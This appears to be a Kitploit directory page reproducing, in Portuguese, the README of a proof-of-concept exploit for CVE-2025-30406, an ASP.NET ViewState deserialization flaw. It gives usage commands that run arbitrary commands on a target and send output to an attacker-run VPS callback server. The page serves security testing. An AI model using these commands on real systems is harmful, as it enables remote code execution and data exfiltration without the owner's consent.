Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-30406 — CVE-2025-30406 ViewState Exploit PoC | Kitploit
Ferramentas/GitHubGitHub/mchklt/cve-2025-30406
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubmchklt/cve-2025-30406

CVE-2025-30406

CVE-2025-30406 ViewState Exploit PoC

Ver Repositório
90184há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-30406 Prova de Conceito (PoC) de Exploração do ViewState

Visão Geral

Este é um script de Prova de Conceito (PoC) que demonstra uma exploração de desserialização do ViewState para CVE-2025-30406 em aplicações ASP.NET. Ele utiliza o ysoserial para gerar um payload malicioso do ViewState e o envia para uma URL especificada pelo utilizador, a fim de executar um comando fornecido. Para melhores resultados, a saída do comando pode ser exfiltrada para um servidor HTTP personalizado (server.py) executado numa VPS, que exibe os resultados num formato estilizado com timestamps, prompts verdes e texto de saída branco. Este script destina-se apenas a fins educacionais e deve ser utilizado unicamente em sistemas onde tenha autorização explícita para realizar testes de segurança. O uso não autorizado é ilegal e antiético.

Detalhes da CVE

  • ID da CVE: CVE-2025-30406
  • Descrição: Uma vulnerabilidade de desserialização no tratamento do ViewState do ASP.NET que permite execução remota de código quando uma chave de validação e um gerador válidos são conhecidos.
  • Sistemas Afetados: Aplicações ASP.NET com configurações vulneráveis do ViewState.
  • Pré-requisitos para Exploração:
    • Acesso a uma chave de validação e um gerador válidos do ViewState.
    • Um endpoint vulnerável que aceite parâmetros do ViewState.

Conteúdo do Repositório

  • exploit.py: O script PoC principal para gerar e enviar o payload do ViewState.
Baixar ferramenta
  • server.py: Um servidor HTTP para receber e exibir a saída do comando exfiltrado num formato estilizado.
  • README.md: Este ficheiro, com instruções de configuração e utilização.
  • Pré-requisitos

    • Python 3.x
    • Biblioteca requests (pip install requests)
    • Executável ysoserial (Windows ou equivalente para a sua plataforma)
    • Um endpoint de aplicação ASP.NET vulnerável
    • Uma VPS ou servidor para executar server.py (recomendado para exfiltração)
    • Permissão para testar o sistema alvo

    Instalação

    1. Clone este repositório:
      root@kitploit:~
      git clone https://github.com/yourusername/cve-2025-30406-poc.git
      cd cve-2025-30406-poc
      
    2. Instale o pacote Python necessário:
      root@kitploit:~
      pip install requests
      
    3. Descarregue o ysoserial e coloque-o no mesmo diretório que exploit.py ou especifique o seu caminho:
      • ysoserial GitHub

    Configuração numa VPS (Recomendado)

    Para receber a saída do comando exfiltrado num formato estilizado, execute server.py numa VPS:

    1. Copie server.py para a sua VPS (ex.: via scp):
      root@kitploit:~
      scp server.py user@your-vps-ip:/home/user/
      
    2. Certifique-se de que o Python 3 está instalado:
      root@kitploit:~
      sudo apt update && sudo apt install python3 python3-pip
      
    3. Execute o servidor (porta padrão 8000):
      root@kitploit:~
      python3 server.py
      
    4. Garanta que a firewall da VPS permita tráfego de entrada na porta 8000:
      root@kitploit:~
      sudo ufw allow 8000
      
    5. Anote o IP público ou domínio da VPS (ex.: http://your-vps-ip:8000) para usar com o parâmetro -e no exploit.py.

    Utilização

    Executando a Exploração

    Execute exploit.py com os argumentos necessários. O parâmetro -e é opcional, mas altamente recomendado para exfiltrar a saída do comando para o server.py e obter uma exibição estilizada.

    root@kitploit:~
    python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]
    

    Argumentos

    • -u, --url: URL alvo (ex.: http://target.com/page.aspx) [Obrigatório]
    • -c, --command: Comando a executar (ex.: whoami) [Obrigatório]
    • -y, --ysoserial: Caminho para o executável ysoserial (padrão: ./ysoserial.exe) [Opcional]
    • -e, --exfil: URL de callback para exfiltrar a saída do comando (ex.: http://your-vps:8000) [Opcional]

    Exemplos

    1. Executar sem exfiltração (execução cega):
      root@kitploit:~
      python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
      
    2. Executar com exfiltração para uma VPS a correr server.py (recomendado):
      root@kitploit:~
      python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
      

    Executando o Servidor

    Na sua VPS ou máquina local, inicie o servidor HTTP para receber a saída exfiltrada:

    root@kitploit:~
    python3 server.py
    

    O servidor exibirá a saída do comando com timestamps, um prompt verde $ e texto branco para legibilidade.

    Como Funciona

    1. Script de Exploração (exploit.py):
      • Utiliza o ysoserial com uma chave de validação e um gerador codificados para criar um payload do ViewState.
      • Se -e for fornecido, o comando é encapsulado para capturar a saída e enviá-la para a URL de callback via Invoke-WebRequest.
      • Envia o payload para a URL alvo num pedido POST, embutido no parâmetro __VIEWSTATE.
      • Imprime o estado da resposta do servidor e uma parte do corpo da resposta.
    2. Servidor HTTP (server.py):
      • Escuta pedidos GET contendo a saída do comando.
      • Descodifica o caminho da URL e divide-o em linhas.
      • Imprime cada linha com um timestamp, um prompt verde $ e texto de saída branco.
      • Responde com HTTP 200 e “OK”.

    Aviso de Uso Ético

    • Este script é uma prova de conceito para a CVE-2025-30406, destinado a fins educacionais e testes de segurança autorizados.
    • Não utilize este script em sistemas sem permissão explícita do proprietário do sistema.
    • O uso indevido pode violar leis, incluindo o Computer Fraud and Abuse Act (CFAA) nos Estados Unidos ou leis semelhantes noutros países.
    • Obtenha sempre consentimento por escrito antes de testar qualquer sistema.
    • Reporte vulnerabilidades de forma responsável através de divulgação coordenada ou programas de bug bounty.

    Limitações

    • A chave de validação e o gerador codificados podem funcionar apenas para aplicações vulneráveis específicas. Os utilizadores podem necessitar de valores específicos da aplicação.
    • A exploração visa aplicações ASP.NET vulneráveis à desserialização do ViewState.
    • O script assume que o servidor alvo processa corretamente o payload do ViewState.
    • A compatibilidade entre plataformas depende da disponibilidade do ysoserial (principalmente baseado em Windows).
    • A exfiltração requer um servidor publicamente acessível para a URL de callback -e.

    Licença

    Este projeto está licenciado sob a Licença MIT. Consulte o ficheiro LICENSE para obter mais detalhes.

    Contacto

    Para perguntas ou feedback, por favor, abra uma issue neste repositório.